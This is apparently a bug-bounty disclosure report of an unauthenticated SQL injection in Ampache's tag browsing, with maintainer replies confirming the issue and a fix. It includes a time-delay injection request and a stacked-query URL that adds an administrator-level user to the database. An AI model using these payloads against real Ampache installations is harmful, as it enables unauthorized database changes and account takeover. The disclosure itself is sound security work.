SQL Injection in ampache/ampache

Valid

Reported on

Oct 5th 2021


Description

The application does not validate and escape the type parameter before using it in a SQL statement in Model/Tag.php, leading to a SQL Injection

Proof of Concept

Time delay:

GET /browse.php?action=tag&type=0%27or(if(now()=sysdate(),sleep(3),0))or%27 HTTP/1.1
Host: demo.ampache.dev
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Impact

Vulnerability allows unauthenticated users to perform SQL injection A successful attack may result the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, write file to server lead to Remote code Execute, or write a script to extract data.

We have contacted a member of the ampache team and are waiting to hear back 2 months ago
We have contacted a member of the ampache team and are waiting to hear back 2 months ago
lachlan
2 months ago

Maintainer


i've replied to your email, do you have a better attack link? this doesn't seem to affect the demo site

laladee
2 months ago

Researcher


Hi, This is an example of slow query attack You can try it with "stacked query" payload: https://demo.ampache.dev/browse.php?action=tag&type=1%27%3b+INSERT+INTO+user+(username,access)+VALUES+(%27Laladee%27,%27100%27)%3b%27 You can check it out, new user named "Laladee" successfully added

lachlan validated this vulnerability a month ago
laladee has been awarded the disclosure bounty
The fix bounty is now up for grabs
lachlan
a month ago

Maintainer


fixed in the develop.ampache.dev page now.

lachlan confirmed that a fix has been merged on 6d21e4 a month ago
lachlan has been awarded the fix bounty